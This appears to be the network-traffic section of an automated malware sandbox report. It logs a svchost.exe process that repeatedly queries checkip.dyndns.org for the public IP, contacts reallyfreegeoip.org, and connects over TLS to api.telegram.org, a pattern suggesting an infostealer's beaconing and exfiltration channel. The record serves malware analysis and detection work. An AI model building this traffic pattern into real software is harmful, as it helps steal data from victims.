                                                                                                                Jan 10, 2025 15:34:03.481576920 CET44349795104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 15:34:03.481659889 CET49795443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 15:34:03.481906891 CET49795443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 15:34:03.481921911 CET44349795104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 15:34:03.522552967 CET4979080192.168.2.5132.226.247.73
                                                                                                                Jan 10, 2025 15:34:03.966530085 CET44349795104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 15:34:03.968296051 CET49795443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 15:34:03.968329906 CET44349795104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 15:34:04.125726938 CET44349795104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 15:34:04.125816107 CET44349795104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 15:34:04.125904083 CET49795443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 15:34:04.126415968 CET49795443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 15:34:04.129048109 CET4979080192.168.2.5132.226.247.73
                                                                                                                Jan 10, 2025 15:34:04.133994102 CET8049790132.226.247.73192.168.2.5
                                                                                                                Jan 10, 2025 15:34:04.134764910 CET4980180192.168.2.5132.226.247.73
                                                                                                                Jan 10, 2025 15:34:04.134782076 CET4979080192.168.2.5132.226.247.73
                                                                                                                Jan 10, 2025 15:34:04.139568090 CET8049801132.226.247.73192.168.2.5
                                                                                                                Jan 10, 2025 15:34:04.139647961 CET4980180192.168.2.5132.226.247.73
                                                                                                                Jan 10, 2025 15:34:04.139734030 CET4980180192.168.2.5132.226.247.73
                                                                                                                Jan 10, 2025 15:34:04.147289038 CET8049801132.226.247.73192.168.2.5
                                                                                                                Jan 10, 2025 15:34:04.811778069 CET8049801132.226.247.73192.168.2.5
                                                                                                                Jan 10, 2025 15:34:04.813015938 CET49806443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 15:34:04.813054085 CET44349806104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 15:34:04.813150883 CET49806443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 15:34:04.813397884 CET49806443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 15:34:04.813417912 CET44349806104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 15:34:04.866267920 CET4980180192.168.2.5132.226.247.73
                                                                                                                Jan 10, 2025 15:34:05.276787043 CET44349806104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 15:34:05.278651953 CET49806443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 15:34:05.278683901 CET44349806104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 15:34:05.423652887 CET44349806104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 15:34:05.423984051 CET44349806104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 15:34:05.424192905 CET49806443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 15:34:05.424683094 CET49806443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 15:34:05.462675095 CET4980180192.168.2.5132.226.247.73
                                                                                                                Jan 10, 2025 15:34:05.463469982 CET49812443192.168.2.5149.154.167.220
                                                                                                                Jan 10, 2025 15:34:05.463500977 CET44349812149.154.167.220192.168.2.5
                                                                                                                Jan 10, 2025 15:34:05.463567019 CET49812443192.168.2.5149.154.167.220
                                                                                                                Jan 10, 2025 15:34:05.463962078 CET49812443192.168.2.5149.154.167.220
                                                                                                                Jan 10, 2025 15:34:05.463973999 CET44349812149.154.167.220192.168.2.5
                                                                                                                Jan 10, 2025 15:34:05.467617989 CET8049801132.226.247.73192.168.2.5
                                                                                                                Jan 10, 2025 15:34:05.467690945 CET4980180192.168.2.5132.226.247.73
                                                                                                                Jan 10, 2025 15:34:06.092937946 CET44349812149.154.167.220192.168.2.5
                                                                                                                Jan 10, 2025 15:34:06.093086958 CET49812443192.168.2.5149.154.167.220
                                                                                                                Jan 10, 2025 15:34:06.094536066 CET49812443192.168.2.5149.154.167.220
                                                                                                                Jan 10, 2025 15:34:06.094542027 CET44349812149.154.167.220192.168.2.5
                                                                                                                Jan 10, 2025 15:34:06.094877005 CET44349812149.154.167.220192.168.2.5
                                                                                                                Jan 10, 2025 15:34:06.096501112 CET49812443192.168.2.5149.154.167.220
                                                                                                                Jan 10, 2025 15:34:06.139322996 CET44349812149.154.167.220192.168.2.5
                                                                                                                Jan 10, 2025 15:34:06.345060110 CET44349812149.154.167.220192.168.2.5
                                                                                                                Jan 10, 2025 15:34:06.345151901 CET44349812149.154.167.220192.168.2.5
                                                                                                                Jan 10, 2025 15:34:06.345788956 CET49812443192.168.2.5149.154.167.220
                                                                                                                Jan 10, 2025 15:34:06.348278046 CET49812443192.168.2.5149.154.167.220
                                                                                                                Jan 10, 2025 15:34:12.055591106 CET4973980192.168.2.5132.226.247.73

                                                                                                                UDP Packets

                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                Jan 10, 2025 15:33:41.228461027 CET5311853192.168.2.51.1.1.1
                                                                                                                Jan 10, 2025 15:33:41.235352039 CET53531181.1.1.1192.168.2.5
                                                                                                                Jan 10, 2025 15:33:42.744076967 CET6054453192.168.2.51.1.1.1
                                                                                                                Jan 10, 2025 15:33:42.753000021 CET53605441.1.1.1192.168.2.5
                                                                                                                Jan 10, 2025 15:33:53.726283073 CET5144653192.168.2.51.1.1.1
                                                                                                                Jan 10, 2025 15:33:53.733021021 CET53514461.1.1.1192.168.2.5

                                                                                                                DNS Queries

                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                Jan 10, 2025 15:33:41.228461027 CET192.168.2.51.1.1.10x30a0Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                Jan 10, 2025 15:33:42.744076967 CET192.168.2.51.1.1.10x7be8Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                Jan 10, 2025 15:33:53.726283073 CET192.168.2.51.1.1.10xac54Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                                                                DNS Answers

                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                Jan 10, 2025 15:33:41.235352039 CET1.1.1.1192.168.2.50x30a0No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                Jan 10, 2025 15:33:41.235352039 CET1.1.1.1192.168.2.50x30a0No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                Jan 10, 2025 15:33:41.235352039 CET1.1.1.1192.168.2.50x30a0No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                Jan 10, 2025 15:33:41.235352039 CET1.1.1.1192.168.2.50x30a0No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                Jan 10, 2025 15:33:41.235352039 CET1.1.1.1192.168.2.50x30a0No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                Jan 10, 2025 15:33:41.235352039 CET1.1.1.1192.168.2.50x30a0No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                Jan 10, 2025 15:33:42.753000021 CET1.1.1.1192.168.2.50x7be8No error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                                                                Jan 10, 2025 15:33:42.753000021 CET1.1.1.1192.168.2.50x7be8No error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                                                                Jan 10, 2025 15:33:42.753000021 CET1.1.1.1192.168.2.50x7be8No error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                                                                Jan 10, 2025 15:33:42.753000021 CET1.1.1.1192.168.2.50x7be8No error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                                                                Jan 10, 2025 15:33:42.753000021 CET1.1.1.1192.168.2.50x7be8No error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                                                                                Jan 10, 2025 15:33:42.753000021 CET1.1.1.1192.168.2.50x7be8No error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                                                                Jan 10, 2025 15:33:42.753000021 CET1.1.1.1192.168.2.50x7be8No error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                                                                Jan 10, 2025 15:33:53.733021021 CET1.1.1.1192.168.2.50xac54No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                                                                HTTP Request Dependency Graph

                                                                                                                • reallyfreegeoip.org
                                                                                                                • api.telegram.org
                                                                                                                • checkip.dyndns.org

                                                                                                                HTTP Packets

                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                0192.168.2.549704132.226.247.73802684C:\Windows\SysWOW64\svchost.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 10, 2025 15:33:41.246402979 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Jan 10, 2025 15:33:41.939254999 CET273INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 14:33:41 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                Jan 10, 2025 15:33:41.972153902 CET127OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Jan 10, 2025 15:33:42.184575081 CET273INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 14:33:42 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                Jan 10, 2025 15:33:43.514060020 CET127OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Jan 10, 2025 15:33:43.724380970 CET273INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 14:33:43 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                1192.168.2.549707132.226.247.73802684C:\Windows\SysWOW64\svchost.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 10, 2025 15:33:44.419333935 CET127OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Jan 10, 2025 15:33:45.107078075 CET273INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 14:33:45 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                2192.168.2.549709132.226.247.73802684C:\Windows\SysWOW64\svchost.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 10, 2025 15:33:45.756248951 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Jan 10, 2025 15:33:46.461771965 CET273INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 14:33:46 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                3192.168.2.549711132.226.247.73802684C:\Windows\SysWOW64\svchost.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 10, 2025 15:33:47.096369028 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Jan 10, 2025 15:33:47.776971102 CET273INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 14:33:47 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                4192.168.2.549713132.226.247.73802684C:\Windows\SysWOW64\svchost.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 10, 2025 15:33:48.393336058 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Jan 10, 2025 15:33:49.095928907 CET273INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 14:33:48 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                5192.168.2.549715132.226.247.73802684C:\Windows\SysWOW64\svchost.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 10, 2025 15:33:49.729612112 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Jan 10, 2025 15:33:50.414072990 CET273INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 14:33:50 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                6192.168.2.549717132.226.247.73802684C:\Windows\SysWOW64\svchost.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 10, 2025 15:33:51.031208038 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Jan 10, 2025 15:33:51.713777065 CET273INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 14:33:51 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                7192.168.2.549719132.226.247.73802684C:\Windows\SysWOW64\svchost.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 10, 2025 15:33:52.344095945 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Jan 10, 2025 15:33:53.031411886 CET273INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 14:33:52 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                8192.168.2.549720132.226.247.73806572C:\Windows\SysWOW64\svchost.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 10, 2025 15:33:52.875242949 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Jan 10, 2025 15:33:53.550580978 CET273INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 14:33:53 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                Jan 10, 2025 15:33:53.559459925 CET127OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Jan 10, 2025 15:33:53.770607948 CET273INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 14:33:53 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                Jan 10, 2025 15:33:55.436769962 CET127OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Jan 10, 2025 15:33:55.644865990 CET273INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 14:33:55 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                9192.168.2.549739132.226.247.73806572C:\Windows\SysWOW64\svchost.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 10, 2025 15:33:56.281752110 CET127OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Jan 10, 2025 15:33:56.970197916 CET273INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 14:33:56 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                10192.168.2.549747132.226.247.73806572C:\Windows\SysWOW64\svchost.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 10, 2025 15:33:57.623442888 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Jan 10, 2025 15:33:58.294287920 CET273INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 14:33:58 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
